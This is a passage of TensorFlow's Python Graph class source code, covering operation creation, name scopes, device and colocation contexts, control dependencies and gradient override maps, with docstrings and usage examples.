The `Operation` type to create. This corresponds to the `OpDef.name` field for the proto that defines the operation. inputs: A list of `Tensor` objects that will be inputs to the `Operation`. dtypes: A list of `DType` objects that will be the types of the tensors that the operation produces. input_types: (Optional.) A list of `DType`s that will be the types of the tensors that the operation consumes. By default, uses the base `DType` of each input in `inputs`. Operations that expect reference-typed inputs must specify `input_types` explicitly. name: (Optional.) A string name for the operation. If not specified, a name is generated based on `op_type`. attrs: (Optional.) A dictionary where the key is the attribute name (a string) and the value is the respective `attr` attribute of the `NodeDef` proto that will represent the operation (an `AttrValue` proto). op_def: (Optional.) The `OpDef` proto that describes the `op_type` that the operation will have. compute_shapes: (Optional.) If True, shape inference will be performed to compute the shapes of the outputs. compute_device: (Optional.) If True, device functions will be executed to compute the device property of the Operation. Raises: TypeError: if any of the inputs is not a `Tensor`. ValueError: if colocation conflicts with existing device assignment. Returns: An `Operation` object. """ self._check_not_finalized() for idx, a in enumerate(inputs): if not isinstance(a, Tensor): raise TypeError("Input #%d is not a tensor: %s" % (idx, a)) if name is None: name = op_type # If a names ends with a '/' it is a "name scope" and we use it as-is, # after removing the trailing '/'. if name and name[-1] == "/": name = _name_from_scope_name(name) else: name = self.unique_name(name) node_def = _NodeDef(op_type, name, device=None, attrs=attrs) # Apply any additional attributes requested. Do not overwrite any existing # attributes. for key, value in self._attr_scope_map.items(): if key not in node_def.attr: if callable(value): value = value(node_def) if not isinstance(value, (type(None), attr_value_pb2.AttrValue)): raise TypeError( "Callable for scope map key '%s' must return either None or " "an AttrValue protocol buffer; but it returned: %s" % (key, value)) node_def.attr[key].CopyFrom(value) # Apply a kernel label if one has been specified for this op_type. try: kernel_label = self._op_to_kernel_label_map[op_type] node_def.attr["_kernel"].CopyFrom( attr_value_pb2.AttrValue(s=compat.as_bytes(kernel_label))) except KeyError: pass # Apply the overriding op_type for gradients if one has been # specified for this op_type. try: mapped_op_type = self._gradient_override_map[op_type] node_def.attr["_gradient_op_type"].CopyFrom( attr_value_pb2.AttrValue(s=compat.as_bytes(mapped_op_type))) except KeyError: pass control_inputs = self._control_dependencies_for_inputs(inputs) ret = Operation( node_def, self, inputs=inputs, output_types=dtypes, control_inputs=control_inputs, input_types=input_types, original_op=self._default_original_op, op_def=op_def) if compute_shapes: set_shapes_for_outputs(ret) self._add_op(ret) self._record_op_seen_by_control_dependencies(ret) if compute_device: self._apply_device_functions(ret) if self._colocation_stack: all_colocation_groups = [] for colocation_op in self._colocation_stack: all_colocation_groups.extend(colocation_op.colocation_groups()) if colocation_op.device: # Make this device match the device of the colocated op, to # provide consistency between the device and the colocation # property. if (ret.device and pydev.canonical_name(ret.device) != pydev.canonical_name(colocation_op.device)): logging.warning("Tried to colocate %s with an op %s that had " "a different device: %s vs %s. " "Ignoring colocation property.", name, colocation_op.name, ret.device, colocation_op.device) else: ret._set_device(colocation_op.device) # pylint: disable=protected-access all_colocation_groups = sorted(set(all_colocation_groups)) ret.node_def.attr["_class"].CopyFrom( attr_value_pb2.AttrValue(list=attr_value_pb2.AttrValue.ListValue( s=all_colocation_groups))) # Sets "container" attribute if # (1) self._container is not None # (2) "is_stateful" is set in OpDef # (3) "container" attribute is in OpDef # (4) "container" attribute is None if (self._container and op_type in self._registered_ops and self._registered_ops[op_type].is_stateful and "container" in ret.node_def.attr and not ret.node_def.attr["container"].s): ret.node_def.attr["container"].CopyFrom( attr_value_pb2.AttrValue(s=compat.as_bytes(self._container))) return ret def as_graph_element(self, obj, allow_tensor=True, allow_operation=True): """Returns the object referred to by `obj`, as an `Operation` or `Tensor`. This function validates that `obj` represents an element of this graph, and gives an informative error message if it is not. This function is the canonical way to get/validate an object of one of the allowed types from an external argument reference in the Session API. This method may be called concurrently from multiple threads. Args: obj: A `Tensor`, an `Operation`, or the name of a tensor or operation. Can also be any object with an `_as_graph_element()` method that returns a value of one of these types. allow_tensor: If true, `obj` may refer to a `Tensor`. allow_operation: If true, `obj` may refer to an `Operation`. Returns: The `Tensor` or `Operation` in the Graph corresponding to `obj`. Raises: TypeError: If `obj` is not a type we support attempting to convert to types. ValueError: If `obj` is of an appropriate type but invalid. For example, an invalid string. KeyError: If `obj` is not an object in the graph. """ if self._finalized: return self._as_graph_element_locked(obj, allow_tensor, allow_operation) with self._lock: return self._as_graph_element_locked(obj, allow_tensor, allow_operation) def _as_graph_element_locked(self, obj, allow_tensor, allow_operation): """See `Graph.as_graph_element()` for details.""" # The vast majority of this function is figuring # out what an API user might be doing wrong, so # that we can give helpful error messages. # # Ideally, it would be nice to split it up, but we # need context to generate nice error messages. if allow_tensor and allow_operation: types_str = "Tensor or Operation" elif allow_tensor: types_str = "Tensor" elif allow_operation: types_str = "Operation" else: raise ValueError("allow_tensor and allow_operation can't both be False.") temp_obj = _as_graph_element(obj) if temp_obj is not None: obj = temp_obj # If obj appears to be a name... if isinstance(obj, compat.bytes_or_text_types): name = compat.as_str(obj) if ":" in name and allow_tensor: # Looks like a Tensor name and can be a Tensor. try: op_name, out_n = name.split(":") out_n = int(out_n) except: raise ValueError("The name %s looks a like a Tensor name, but is " "not a valid one. Tensor names must be of the " "form \"<op_name>:<output_index>\"." % repr(name)) if op_name in self._nodes_by_name: op = self._nodes_by_name[op_name] else: raise KeyError("The name %s refers to a Tensor which does not " "exist. The operation, %s, does not exist in the " "graph." % (repr(name), repr(op_name))) try: return op.outputs[out_n] except: raise KeyError("The name %s refers to a Tensor which does not " "exist. The operation, %s, exists but only has " "%s outputs." % (repr(name), repr(op_name), len(op.outputs))) elif ":" in name and not allow_tensor: # Looks like a Tensor name but can't be a Tensor. raise ValueError("Name %s appears to refer to a Tensor, not a %s." % (repr(name), types_str)) elif ":" not in name and allow_operation: # Looks like an Operation name and can be an Operation. if name not in self._nodes_by_name: raise KeyError("The name %s refers to an Operation not in the " "graph." % repr(name)) return self._nodes_by_name[name] elif ":" not in name and not allow_operation: # Looks like an Operation name but can't be an Operation. if name in self._nodes_by_name: # Yep, it's an Operation name err_msg = ("The name %s refers to an Operation, not a %s." % (repr(name), types_str)) else: err_msg = ("The name %s looks like an (invalid) Operation name, " "not a %s." % (repr(name), types_str)) err_msg += (" Tensor names must be of the form " "\"<op_name>:<output_index>\".") raise ValueError(err_msg) elif isinstance(obj, Tensor) and allow_tensor: # Actually obj is just the object it's referring to. if obj.graph is not self: raise ValueError("Tensor %s is not an element of this graph." % obj) return obj elif isinstance(obj, Operation) and allow_operation: # Actually obj is just the object it's referring to. if obj.graph is not self: raise ValueError("Operation %s is not an element of this graph." % obj) return obj else: # We give up! raise TypeError("Can not convert a %s into a %s." % (type(obj).__name__, types_str)) def get_operations(self): """Return the list of operations in the graph. You can modify the operations in place, but modifications to the list such as inserts/delete have no effect on the list of operations known to the graph. This method may be called concurrently from multiple threads. Returns: A list of Operations. """ if self._finalized: return list(self._nodes_by_id.values()) with self._lock: return list(self._nodes_by_id.values()) def get_operation_by_name(self, name): """Returns the `Operation` with the given `name`. This method may be called concurrently from multiple threads. Args: name: The name of the `Operation` to return. Returns: The `Operation` with the given `name`. Raises: TypeError: If `name` is not a string. KeyError: If `name` does not correspond to an operation in this graph. """ if not isinstance(name, six.string_types): raise TypeError("Operation names are strings (or similar), not %s." % type(name).__name__) return self.as_graph_element(name, allow_tensor=False, allow_operation=True) def _get_operation_by_name_unsafe(self, name): """Returns the `Operation` with the given `name`. This is a internal unsafe version of get_operation_by_name. It skips many checks and does not have user friedly error messages but runs considerably faster. This method may be called concurrently from multiple threads. Args: name: The name of the `Operation` to return. Returns: The `Operation` with the given `name`. Raises: KeyError: If `name` does not correspond to an operation in this graph. """ if self._finalized: return self._nodes_by_name[name] with self._lock: return self._nodes_by_name[name] def get_tensor_by_name(self, name): """Returns the `Tensor` with the given `name`. This method may be called concurrently from multiple threads. Args: name: The name of the `Tensor` to return. Returns: The `Tensor` with the given `name`. Raises: TypeError: If `name` is not a string. KeyError: If `name` does not correspond to a tensor in this graph. """ # Names should be strings. if not isinstance(name, six.string_types): raise TypeError("Tensor names are strings (or similar), not %s." % type(name).__name__) return self.as_graph_element(name, allow_tensor=True, allow_operation=False) def _get_tensor_by_tf_output(self, tf_output): """Returns the `Tensor` representing `tf_output`. Note that there is only one such `Tensor`, i.e. multiple calls to this function with the same TF_Output value will always return the same `Tensor` object. Args: tf_output: A wrapped `TF_Output` (the C API equivalent of `Tensor`). Returns: The `Tensor` that represents `tf_output`. """ op_name = c_api.TF_OperationName(tf_output.oper) op = self._get_operation_by_name_unsafe(op_name) return op.outputs[tf_output.index] def _next_id(self): """Id for next Operation instance. Also increments the internal id.""" self._check_not_finalized() with self._lock: self._next_id_counter += 1 return self._next_id_counter @property def _last_id(self): return self._next_id_counter def as_default(self): """Returns a context manager that makes this `Graph` the default graph. This method should be used if you want to create multiple graphs in the same process. For convenience, a global default graph is provided, and all ops will be added to this graph if you do not create a new graph explicitly. Use this method with the `with` keyword to specify that ops created within the scope of a block should be added to this graph. The default graph is a property of the current thread. If you create a new thread, and wish to use the default graph in that thread, you must explicitly add a `with g.as_default():` in that thread's function. The following code examples are equivalent: ```python # 1. Using Graph.as_default(): g = tf.Graph() with g.as_default(): c = tf.constant(5.0) assert c.graph is g # 2. Constructing and making default: with tf.Graph().as_default() as g: c = tf.constant(5.0) assert c.graph is g ``` Returns: A context manager for using this graph as the default graph. """ return _default_graph_stack.get_controller(self) @property def collections(self): """Returns the names of the collections known to this graph.""" return list(self._collections) def add_to_collection(self, name, value): """Stores `value` in the collection with the given `name`. Note that collections are not sets, so it is possible to add a value to a collection several times. Args: name: The key for the collection. The `GraphKeys` class contains many standard names for collections. value: The value to add to the collection. """ # pylint: disable=g-doc-exception _assert_collection_is_ok(name) self._check_not_finalized() with self._lock: if name not in self._collections: self._collections[name] = [value] else: self._collections[name].append(value) def add_to_collections(self, names, value): """Stores `value` in the collections given by `names`. Note that collections are not sets, so it is possible to add a value to a collection several times. This function makes sure that duplicates in `names` are ignored, but it will not check for pre-existing membership of `value` in any of the collections in `names`. `names` can be any iterable, but if `names` is a string, it is treated as a single collection name. Args: names: The keys for the collections to add to. The `GraphKeys` class contains many standard names for collections. value: The value to add to the collections. """ # Make sure names are unique, but treat strings as a single collection name names = (names,) if isinstance(names, six.string_types) else set(names) for name in names: self.add_to_collection(name, value) def get_collection_ref(self, name): """Returns a list of values in the collection with the given `name`. If the collection exists, this returns the list itself, which can be modified in place to change the collection. If the collection does not exist, it is created as an empty list and the list is returned. This is different from `get_collection()` which always returns a copy of the collection list if it exists and never creates an empty collection. Args: name: The key for the collection. For example, the `GraphKeys` class contains many standard names for collections. Returns: The list of values in the collection with the given `name`, or an empty list if no value has been added to that collection. """ # pylint: disable=g-doc-exception _assert_collection_is_ok(name) with self._lock: coll_list = self._collections.get(name, None) if coll_list is None: coll_list = [] self._collections[name] = coll_list return coll_list def get_collection(self, name, scope=None): """Returns a list of values in the collection with the given `name`. This is different from `get_collection_ref()` which always returns the actual collection list if it exists in that it returns a new list each time it is called. Args: name: The key for the collection. For example, the `GraphKeys` class contains many standard names for collections. scope: (Optional.) A string. If supplied, the resulting list is filtered to include only items whose `name` attribute matches `scope` using `re.match`. Items without a `name` attribute are never returned if a scope is supplied. The choice of `re.match` means that a `scope` without special tokens filters by prefix. Returns: The list of values in the collection with the given `name`, or an empty list if no value has been added to that collection. The list contains the values in the order under which they were collected. """ # pylint: disable=g-doc-exception _assert_collection_is_ok(name) with self._lock: collection = self._collections.get(name, None) if collection is None: return [] if scope is None: return list(collection) else: c = [] regex = re.compile(scope) for item in collection: if hasattr(item, "name") and regex.match(item.name): c.append(item) return c def get_all_collection_keys(self): """Returns a list of collections used in this graph.""" with self._lock: return [x for x in self._collections if isinstance(x, six.string_types)] def clear_collection(self, name): """Clears all values in a collection. Args: name: The key for the collection. The `GraphKeys` class contains many standard names for collections. """ self._check_not_finalized() with self._lock: if name in self._collections: del self._collections[name] @tf_contextlib.contextmanager def _original_op(self, op): """Python 'with' handler to help annotate ops with their originator. An op may have an 'original_op' property that indicates the op on which it was based. For example a replica op is based on the op that was replicated and a gradient op is based on the op that was differentiated. All ops created in the scope of this 'with' handler will have the given 'op' as their original op. Args: op: The Operation that all ops created in this scope will have as their original op. Yields: Nothing. """ old_original_op = self._default_original_op try: self._default_original_op = op yield finally: self._default_original_op = old_original_op # pylint: disable=g-doc-return-or-yield,line-too-long @tf_contextlib.contextmanager def name_scope(self, name): r"""Returns a context manager that creates hierarchical names for operations. A graph maintains a stack of name scopes. A `with name_scope(...):` statement pushes a new name onto the stack for the lifetime of the context. The `name` argument will be interpreted as follows: * A string (not ending with '/') will create a new name scope, in which `name` is appended to the prefix of all operations created in the context. If `name` has been used before, it will be made unique by calling `self.unique_name(name)`. * A scope previously captured from a `with g.name_scope(...) as scope:` statement will be treated as an "absolute" name scope, which makes it possible to re-enter existing scopes. * A value of `None` or the empty string will reset the current name scope to the top-level (empty) name scope. For example: ```python with tf.Graph().as_default() as g: c = tf.constant(5.0, name="c") assert c.op.name == "c" c_1 = tf.constant(6.0, name="c") assert c_1.op.name == "c_1" # Creates a scope called "nested" with g.name_scope("nested") as scope: nested_c = tf.constant(10.0, name="c") assert nested_c.op.name == "nested/c" # Creates a nested scope called "inner". with g.name_scope("inner"): nested_inner_c = tf.constant(20.0, name="c") assert nested_inner_c.op.name == "nested/inner/c" # Create a nested scope called "inner_1". with g.name_scope("inner"): nested_inner_1_c = tf.constant(30.0, name="c") assert nested_inner_1_c.op.name == "nested/inner_1/c" # Treats `scope` as an absolute name scope, and # switches to the "nested/" scope. with g.name_scope(scope): nested_d = tf.constant(40.0, name="d") assert nested_d.op.name == "nested/d" with g.name_scope(""): e = tf.constant(50.0, name="e") assert e.op.name == "e" ``` The name of the scope itself can be captured by `with g.name_scope(...) as scope:`, which stores the name of the scope in the variable `scope`. This value can be used to name an operation that represents the overall result of executing the ops in a scope. For example: ```python inputs = tf.constant(...) with g.name_scope('my_layer') as scope: weights = tf.Variable(..., name="weights") biases = tf.Variable(..., name="biases") affine = tf.matmul(inputs, weights) + biases output = tf.nn.relu(affine, name=scope) ``` NOTE: This constructor validates the given `name`. Valid scope names match one of the following regular expressions: [A-Za-z0-9.][A-Za-z0-9_.\\-/]* (for scopes at the root) [A-Za-z0-9_.\\-/]* (for other scopes) Args: name: A name for the scope. Returns: A context manager that installs `name` as a new name scope. Raises: ValueError: If `name` is not a valid scope name, according to the rules above. """ if name: if self._name_stack: # Scopes created in a nested scope may have initial characters # that are illegal as the initial character of an op name # (viz. '-', '\', '/', and '_'). if not _VALID_SCOPE_NAME_REGEX.match(name): raise ValueError("'%s' is not a valid scope name" % name) else: # Scopes created in the root must match the more restrictive # op name regex, which constrains the initial character. if not _VALID_OP_NAME_REGEX.match(name): raise ValueError("'%s' is not a valid scope name" % name) try: old_stack = self._name_stack if not name: # Both for name=None and name="" we re-set to empty scope. new_stack = None elif name[-1] == "/": new_stack = _name_from_scope_name(name) else: new_stack = self.unique_name(name) self._name_stack = new_stack yield "" if new_stack is None else new_stack + "/" finally: self._name_stack = old_stack # pylint: enable=g-doc-return-or-yield,line-too-long def unique_name(self, name, mark_as_used=True): """Return a unique operation name for `name`. Note: You rarely need to call `unique_name()` directly. Most of the time you just need to create `with g.name_scope()` blocks to generate structured names. `unique_name` is used to generate structured names, separated by `"/"`, to help identify operations when debugging a graph. Operation names are displayed in error messages reported by the TensorFlow runtime, and in various visualization tools such as TensorBoard. If `mark_as_used` is set to `True`, which is the default, a new unique name is created and marked as in use. If it's set to `False`, the unique name is returned without actually being marked as used. This is useful when the caller simply wants to know what the name to be created will be. Args: name: The name for an operation. mark_as_used: Whether to mark this name as being used. Returns: A string to be passed to `create_op()` that will be used to name the operation being created. """ if self._name_stack: name = self._name_stack + "/" + name i = self._names_in_use.get(name, 0) # Increment the number for "name". if mark_as_used: self._names_in_use[name] = i + 1 if i > 0: base_name = name # Make sure the composed name is not already used. while name in self._names_in_use: name = "%s_%d" % (base_name, i) i += 1 # Mark the composed name as used in case someone wants # to call unique_name("name_1"). if mark_as_used: self._names_in_use[name] = 1 return name def get_name_scope(self): """Returns the current name scope. For example: ```python with tf.name_scope('scope1'): with tf.name_scope('scope2'): print(tf.get_default_graph().get_name_scope()) ``` would print the string `scope1/scope2`. Returns: A string representing the current name scope. """ return self._name_stack @tf_contextlib.contextmanager def colocate_with(self, op, ignore_existing=False): """Returns a context manager that specifies an op to colocate with. Note: this function is not for public use, only for internal libraries. For example: ```python a = tf.Variable([1.0]) with g.colocate_with(a): b = tf.constant(1.0) c = tf.add(a, b) ``` `b` and `c` will always be colocated with `a`, no matter where `a` is eventually placed. **NOTE** Using a colocation scope resets any existing device constraints. If `op` is `None` then `ignore_existing` must be `True` and the new scope resets all colocation and device constraints. Args: op: The op to colocate all created ops with, or `None`. ignore_existing: If true, only applies colocation of this op within the context, rather than applying all colocation properties on the stack. If `op` is `None`, this value must be `True`. Raises: ValueError: if op is None but ignore_existing is False. Yields: A context manager that specifies the op with which to colocate newly created ops. """ if op is None and not ignore_existing: raise ValueError("Trying to reset colocation (op is None) but " "ignore_existing is not True") if op is not None and not isinstance(op, Operation): # We always want to colocate with the reference op. op = internal_convert_to_tensor_or_indexed_slices(op, as_ref=True).op # By default, colocate_with resets the device function stack, # since colocate_with is typically used in specific internal # library functions where colocation is intended to be "stronger" # than device functions. # # In the future, a caller may specify that device_functions win # over colocation, in which case we can add support. device_fn_tmp = self._device_function_stack self._device_function_stack = [] if ignore_existing: current_stack = self._colocation_stack self._colocation_stack = [] if op is not None: self._colocation_stack.append(op) try: yield finally: # Restore device function stack self._device_function_stack = device_fn_tmp if op is not None: self._colocation_stack.pop() # Reset the colocation stack if requested. if ignore_existing: self._colocation_stack = current_stack @tf_contextlib.contextmanager def device(self, device_name_or_function): # pylint: disable=line-too-long """Returns a context manager that specifies the default device to use. The `device_name_or_function` argument may either be a device name string, a device function, or None: * If it is a device name string, all operations constructed in this context will be assigned to the device with that name, unless overridden by a nested `device()` context. * If it is a function, it will be treated as a function from Operation objects to device name strings, and invoked each time a new Operation is created. The Operation will be assigned to the device with the returned name. * If it is None, all `device()` invocations from the enclosing context will be ignored. For information about the valid syntax of device name strings, see the documentation in [`DeviceNameUtils`](https://www.tensorflow.org/code/tensorflow/core/util/device_name_utils.h). For example: ```python with g.device('/device:GPU:0'): # All operations constructed in this context will be placed # on GPU 0. with g.device(None): # All operations constructed in this context will have no # assigned device. # Defines a function from `Operation` to device string. def matmul_on_gpu(n): if n.type == "MatMul": return "/device:GPU:0" else: return "/cpu:0" with g.device(matmul_on_gpu): # All operations of type "MatMul" constructed in this context # will be placed on GPU 0; all other operations will be placed # on CPU 0. ``` **N.B.** The device scope may be overridden by op wrappers or other library code. For example, a variable assignment op `v.assign()` must be colocated with the `tf.Variable` `v`, and incompatible device scopes will be ignored. Args: device_name_or_function: The device name or function to use in the context. Yields: A context manager that specifies the default device to use for newly created ops. """ # pylint: enable=line-too-long if (device_name_or_function is not None and not callable(device_name_or_function)): device_function = pydev.merge_device(device_name_or_function) else: device_function = device_name_or_function try: self._device_function_stack.append(device_function) yield finally: self._device_function_stack.pop() def _apply_device_functions(self, op): """Applies the current device function stack to the given operation.""" # Apply any device functions in reverse order, so that the most recently # pushed function has the first chance to apply a device to the op. # We apply here because the result can depend on the Operation's # signature, which is computed in the Operation constructor. for device_function in reversed(self._device_function_stack): if device_function is None: break op._set_device(device_function(op)) # pylint: disable=protected-access # pylint: disable=g-doc-return-or-yield @tf_contextlib.contextmanager def container(self, container_name): """Returns a context manager that specifies the resource container to use. Stateful operations, such as variables and queues, can maintain their states on devices so that they can be shared by multiple processes. A resource container is a string name under which these stateful operations are tracked. These resources can be released or cleared with `tf.Session.reset()`. For example: ```python with g.container('experiment0'): # All stateful Operations constructed in this context will be placed # in resource container "experiment0". v1 = tf.Variable([1.0]) v2 = tf.Variable([2.0]) with g.container("experiment1"): # All stateful Operations constructed in this context will be # placed in resource container "experiment1". v3 = tf.Variable([3.0]) q1 = tf.FIFOQueue(10, tf.float32) # All stateful Operations constructed in this context will be # be created in the "experiment0". v4 = tf.Variable([4.0]) q1 = tf.FIFOQueue(20, tf.float32) with g.container(""): # All stateful Operations constructed in this context will be # be placed in the default resource container. v5 = tf.Variable([5.0]) q3 = tf.FIFOQueue(30, tf.float32) # Resets container "experiment0", after which the state of v1, v2, v4, q1 # will become undefined (such as uninitialized). tf.Session.reset(target, ["experiment0"]) ``` Args: container_name: container name string. Returns: A context manager for defining resource containers for stateful ops, yields the container name. """ original_container = self._container try: self._container = self._container_prefix + container_name yield self._container finally: self._container = original_container # pylint: enable=g-doc-return-or-yield class _ControlDependenciesController(object): """Context manager for `control_dependencies()`.""" def __init__(self, graph, control_inputs): """Create a new `_ControlDependenciesController`. A `_ControlDependenciesController` is the context manager for `with tf.control_dependencies()` blocks. These normally nest, as described in the documentation for `control_dependencies()`. The `control_inputs` argument list control dependencies that must be added to the current set of control dependencies. Because of uniquification the set can be empty even if the caller passed a list of ops. The special value `None` indicates that we want to start a new empty set of control dependencies instead of extending the current set. In that case we also clear the current control flow context, which is an additional mechanism to add control dependencies. Args: graph: The graph that this controller is managing. control_inputs: List of ops to use as control inputs in addition to the current control dependencies. None to indicate that the dependencies should be cleared. """ self._graph = graph if control_inputs is None: self._control_inputs = [] self._new_stack = True else: self._control_inputs = control_inputs self._new_stack = False self._seen_nodes = set() self._old_stack = None self._old_control_flow_context = None # pylint: disable=protected-access def __enter__(self): if self._new_stack: # Clear the control_dependencies graph. self._old_stack = self._graph._control_dependencies_stack self._graph._control_dependencies_stack = [] # Clear the control_flow_context too. self._old_control_flow_context = self._graph._get_control_flow_context() self._graph._set_control_flow_context(None) self._graph._push_control_dependencies_controller(self) def __exit__(self, unused_type, unused_value, unused_traceback): self._graph._pop_control_dependencies_controller(self) if self._new_stack: self._graph._control_dependencies_stack = self._old_stack self._graph._set_control_flow_context(self._old_control_flow_context) # pylint: enable=protected-access @property def control_inputs(self): return self._control_inputs def add_op(self, op): self._seen_nodes.add(op) def op_in_group(self, op): return op in self._seen_nodes def _push_control_dependencies_controller(self, controller): self._control_dependencies_stack.append(controller) def _pop_control_dependencies_controller(self, controller): assert self._control_dependencies_stack[-1] is controller self._control_dependencies_stack.pop() def _current_control_dependencies(self): ret = set() for controller in self._control_dependencies_stack: for op in controller.control_inputs: ret.add(op) return ret def _control_dependencies_for_inputs(self, input_tensors): """For an op that takes `input_tensors` as inputs, compute control inputs. The returned control dependencies should yield an execution that is equivalent to adding all control inputs in self._control_dependencies_stack to a newly created op. However, this function attempts to prune the returned control dependencies by observing that nodes created within the same `with control_dependencies(...):` block may have data dependencies that make the explicit approach redundant. Args: input_tensors: The direct data dependencies for an op to be created. Returns: A list of control inputs for the op to be created. """ ret = [] input_ops = set([t.op for t in input_tensors]) for controller in self._control_dependencies_stack: # If any of the input_ops already depends on the inputs from controller, # we say that the new op is dominated (by that input), and we therefore # do not need to add control dependencies for this controller's inputs. dominated = False for op in input_ops: if controller.op_in_group(op): dominated = True break if not dominated: # Don't add a control input if we already have a data dependency on i. # NOTE(mrry): We do not currently track transitive data dependencies, # so we may add redundant control inputs. ret.extend([c for c in controller.control_inputs if c not in input_ops]) return ret def _record_op_seen_by_control_dependencies(self, op): """Record that the given op depends on all registered control dependencies. Args: op: An Operation. """ for controller in self._control_dependencies_stack: controller.add_op(op) def control_dependencies(self, control_inputs): """Returns a context manager that specifies control dependencies. Use with the `with` keyword to specify that all operations constructed within the context should have control dependencies on `control_inputs`. For example: ```python with g.control_dependencies([a, b, c]): # `d` and `e` will only run after `a`, `b`, and `c` have executed. d = ... e = ... ``` Multiple calls to `control_dependencies()` can be nested, and in that case a new `Operation` will have control dependencies on the union of `control_inputs` from all active contexts. ```python with g.control_dependencies([a, b]): # Ops constructed here run after `a` and `b`. with g.control_dependencies([c, d]): # Ops constructed here run after `a`, `b`, `c`, and `d`. ``` You can pass None to clear the control dependencies: ```python with g.control_dependencies([a, b]): # Ops constructed here run after `a` and `b`. with g.control_dependencies(None): # Ops constructed here run normally, not waiting for either `a` or `b`. with g.control_dependencies([c, d]): # Ops constructed here run after `c` and `d`, also not waiting # for either `a` or `b`. ``` *N.B.* The control dependencies context applies *only* to ops that are constructed within the context. Merely using an op or tensor in the context does not add a control dependency. The following example illustrates this point: ```python # WRONG def my_func(pred, tensor): t = tf.matmul(tensor, tensor) with tf.control_dependencies([pred]): # The matmul op is created outside the context, so no control # dependency will be added. return t # RIGHT def my_func(pred, tensor): with tf.control_dependencies([pred]): # The matmul op is created in the context, so a control dependency # will be added. return tf.matmul(tensor, tensor) ``` Args: control_inputs: A list of `Operation` or `Tensor` objects which must be executed or computed before running the operations defined in the context. Can also be `None` to clear the control dependencies. Returns: A context manager that specifies control dependencies for all operations constructed within the context. Raises: TypeError: If `control_inputs` is not a list of `Operation` or `Tensor` objects. """ if control_inputs is None: return self._ControlDependenciesController(self, None) # First convert the inputs to ops, and deduplicate them. # NOTE(mrry): Other than deduplication, we do not currently track direct # or indirect dependencies between control_inputs, which may result in # redundant control inputs. control_ops = [] current = self._current_control_dependencies() for c in control_inputs: if isinstance(c, IndexedSlices): c = c.op c = self.as_graph_element(c) if isinstance(c, Tensor): c = c.op elif not isinstance(c, Operation): raise TypeError("Control input must be Operation or Tensor: %s" % c) if c not in current: control_ops.append(c) current.add(c) return self._ControlDependenciesController(self, control_ops) # pylint: disable=g-doc-return-or-yield @tf_contextlib.contextmanager def _attr_scope(self, attr_map): """EXPERIMENTAL: A context manager for setting attributes on operators. This context manager can be used to add additional attributes to operators within the scope of the context. For example: with ops.Graph().as_default() as g: f_1 = Foo() # No extra attributes with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=False)}): f_2 = Foo() # Additional attribute _a=False with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=True)}): f_3 = Foo() # Additional attribute _a=False with g._attr_scope({"_a": None}): f_4 = Foo() # No additional attributes. Args: attr_map: A dictionary mapping attr name strings to AttrValue protocol buffers or None. Returns: A context manager that sets the kernel label to be used for one or more ops created in that context. Raises: TypeError: If attr_map is not a dictionary mapping strings to AttrValue protobufs. """ if not isinstance(attr_map, dict): raise TypeError("attr_map must be a dictionary mapping " "strings to AttrValue protocol buffers") # The saved_attrs dictionary stores any currently-set labels that # will be overridden by this context manager. saved_attrs = {} # Install the given attribute for name, attr in attr_map.items(): if not (isinstance(name, six.string_types) and (isinstance(attr, (type(None), attr_value_pb2.AttrValue)) or callable(attr))): raise TypeError("attr_map must be a dictionary mapping " "strings to AttrValue protocol buffers or " "callables that emit AttrValue protocol buffers") try: saved_attrs[name] = self._attr_scope_map[name] except KeyError: pass if attr is None: del self._attr_scope_map[name] else: self._attr_scope_map[name] = attr try: yield # The code within the context runs here. finally: # Remove the attributes set for this context, and restore any saved # attributes. for name, attr in attr_map.items(): try: self._attr_scope_map[name] = saved_attrs[name] except KeyError: del self._attr_scope_map[name] # pylint: enable=g-doc-return-or-yield # pylint: disable=g-doc-return-or-yield @tf_contextlib.contextmanager def _kernel_label_map(self, op_to_kernel_label_map): """EXPERIMENTAL: A context manager for setting kernel labels. This context manager can be used to select particular implementations of kernels within the scope of the context. For example: with ops.Graph().as_default() as g: f_1 = Foo() # Uses the default registered kernel for the Foo op. with g.kernel_label_map({"Foo": "v_2"}): f_2 = Foo() # Uses the registered kernel with label "v_2" # for the Foo op. with g.kernel_label_map({"Foo": "v_3"}): f_3 = Foo() # Uses the registered kernel with label "v_3" # for the Foo op. with g.kernel_label_map({"Foo": ""}): f_4 = Foo() # Uses the default registered kernel # for the Foo op. Args: op_to_kernel_label_map: A dictionary mapping op type strings to kernel label strings. Returns: A context manager that sets the kernel label to be used for one or more ops created in that context. Raises: TypeError: If op_to_kernel_label_map is not a dictionary mapping strings to strings. """ if not isinstance(op_to_kernel_label_map, dict): raise TypeError("op_to_kernel_label_map must be a dictionary mapping " "strings to strings") # The saved_labels dictionary stores any currently-set labels that # will be overridden by this context manager. saved_labels = {} # Install the given label for op_type, label in op_to_kernel_label_map.items(): if not (isinstance(op_type, six.string_types) and isinstance(label, six.string_types)): raise TypeError("op_to_kernel_label_map must be a dictionary mapping " "strings to strings") try: saved_labels[op_type] = self._op_to_kernel_label_map[op_type] except KeyError: pass self._op_to_kernel_label_map[op_type] = label try: yield # The code within the context runs here. finally: # Remove the labels set for this context, and restore any saved labels. for op_type, label in op_to_kernel_label_map.items(): try: self._op_to_kernel_label_map[op_type] = saved_labels[op_type] except KeyError: del self._op_to_kernel_label_map[op_type] # pylint: enable=g-doc-return-or-yield # pylint: disable=g-doc-return-or-yield @tf_contextlib.contextmanager def gradient_override_map(self, op_type_map): """EXPERIMENTAL: A context manager for overriding gradient functions. This context manager can be used to override the gradient function that will be used for ops within the scope of the context. For example: ```python @tf.RegisterGradient("CustomSquare") def _custom_square_grad(op, grad): # ... with tf.Graph().as_default() as g: c = tf.constant(5.0) s_1 = tf.square(c) # Uses the default gradient for tf.square. with g.gradient_override_map({"Square": "CustomSquare"}): s_2 = tf.square(s_2) # Uses _custom_square_grad to compute the # gradient of s_2. ``` Args: op_type_map: A dictionary mapping op type strings to alternative op type strings. Returns: A context manager that sets the alternative op type to be used for one or more ops created in that context. Raises: TypeError: If `op_type_map` is not a dictionary mapping strings to strings. """ if not isinstance(op_type_map, dict): raise TypeError("op_type_map must be a dictionary mapping " "strings to strings") # The saved_mappings dictionary stores any currently-set mappings that # will be overridden by this context manager. saved_mappings = {} # Install the given label for op_type, mapped_op_type in op_type_map.items(): if not (isinstance(op_type, six.string_types) and isinstance(mapped_op_type, six.string_types)): raise TypeError("op_type_map must be a dictionary mapping " "strings to strings") try: saved_mappings[op_type] = 